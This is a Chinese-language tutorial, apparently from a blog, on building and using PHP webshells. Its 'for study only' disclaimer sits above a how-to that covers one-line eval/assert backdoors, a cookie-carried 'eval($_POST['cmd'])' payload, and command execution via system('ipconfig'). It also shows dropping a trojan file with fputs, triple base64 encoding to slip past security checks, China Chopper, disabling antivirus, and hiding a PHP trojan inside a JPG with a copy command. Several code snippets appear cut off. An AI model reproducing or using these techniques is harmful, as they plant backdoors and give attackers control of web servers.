数据来源
本文仅用于信息安全的学习,请遵守相关法律法规,严禁用于非法途径。若观众因此作出任何危害网络安全的行为,后果自负,与本人无关。
webshell是以 asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境 · 也可以得其称做为种网页木马后门。
攻击者可通过这种网页后门获得网站服务器作权限 · 控制网站服务器以进行上传下载文件、查看数据库、执行命令等...
木马:全称“特洛伊木马( Trojan Horse)” · 指寄宿在计算机里的一种非授权的远程控制程序 · 它可以在计算机管理员未发觉的情况下 · 开放系统权限 · 泄露用户信息给攻击者 · 是黑客常用的工具之。
后门:一台计算机上有65535个端口 · 每个端口是计算机与外界连接所开的“门” · 每个门都有计算机提供的一些服务 · 攻击者利用这些服务·获取服务器的权限 · 给自己进入计算机留下一个后门
eval函数:把字符串当成代码执行
$_POST[ ]:以POST的形式传递数据给PHP页面
用来获取由浏览器通过GET方法提交的数据。
GET方法他是通过把参数数加在提交表单的 action 属性所指的URL中,值和表单内每个字一一对应,然后在URL中可以看到,但是有如下缺点:
用来获取由浏览器通过POST方法提交的数据
POST方法他是通过HTTP POST机制,将表单的各个字段放置在HTTP HEADER内一起传到acton属性所指的URL地址中,用户看不到这个过程。
他提交的大小一般来说不受限,但是具体根据务器的不同,还是略有不同,相对于_GET方式安全性略高。
HTTP数据包($_GET、$_POST、$_COOKIES)
注意:下面介绍的一句话代码很容易被电脑自带的杀毒功能查杀,如果要实验可以关闭病毒查杀功能,如果要免杀自行百度查看教程。
或者 使用windows系统自带的功能进行代理
查看phpinfo页面:
pass=phpinfo();
不过上面这个回显看起来让人头大,我们可以选择“Render”呈现展示那些代码在Web上显示的样子
如:ipconfig 查看ip信息
pass=system('ipconfig');
重新发包
assert() 会检查指定的 assertion 并在结果为 false 时采取适当的行动
如assertion 是字符串,它将会被assert()当做PHP代码来执行
示例:
跟上面的步骤一样创建一个PHP文件把代码粘贴进去并访问,建议在WWW文件夹加创建一个名为Webshell的文件夹,把这些有关于 Webshell的后门文件都放在里面进行分类方便以后寻找。
这里使用中国菜刀打开文件(这个菜刀软件找了一天,下载很多版本都无法正常使用,这个版本是包含源码和可运行文件,很多人写的文章都是只有使用教程没有软件下载链接,你们以后攻击别人电脑被捕了,千万不要说是用我的链接下载的攻击工具)
Cookie: 1=eval($_POST['cmd'])
fputs是一个函数,具有的功能是向指定的文件写入一个字符串
fopen 其功能是使用给定的模式 mode 打开 filename 所指向的文件。文件顺利打开后,指向该流的文件指针就会被返回。如果文件打开失败则返回 NULL,并把错误代码存在 error 中
fopen函数的功能是打开一个文件,其调用的一般形式为:(来源)
文件指针名=fopen(文件名,使用文件方式)。
"w" = “wt”:新建一个文本文件,已存在的文件将内容清空,只允许写
下面这句代码的意思是创建一个up.php文件,文件的内容是:
'); ?>
示例:
创建一个php文件,我这里的文件名是fputs
在浏览器中访问我们的木马文件
我们真正的目的就是通过一句话木马上传我们的将要生成的up.php文件的内容改成下面的小马代码就好了,我这里为了方便直接将up.php文件的内容改成下面的(代码来源)
为了避开一些安全检查,我们可以把代码转换成base64字符串,我这里是使用小葵进行字符转换,也可以在百度搜索在线的字符转换工具。
新建一个把下面代码粘贴进去:base64.php
base64_decode() 这函数是PHP解密base64字符串的函数,文件内容的加密前两次加密后一直有特殊字符,所以这里加密了三次,解密使用的base64_decode()也使用了三次
浏览器访问base64.php之后就会生成一个qq.php文件,里面的内容和up.php是一样的
可以在浏览器中访问qq.php
大马链接(代码来源)
1.php的内容可以是我们的一句话马:
命令:
copy 1.jpg/b + 1.php/a 2.jpg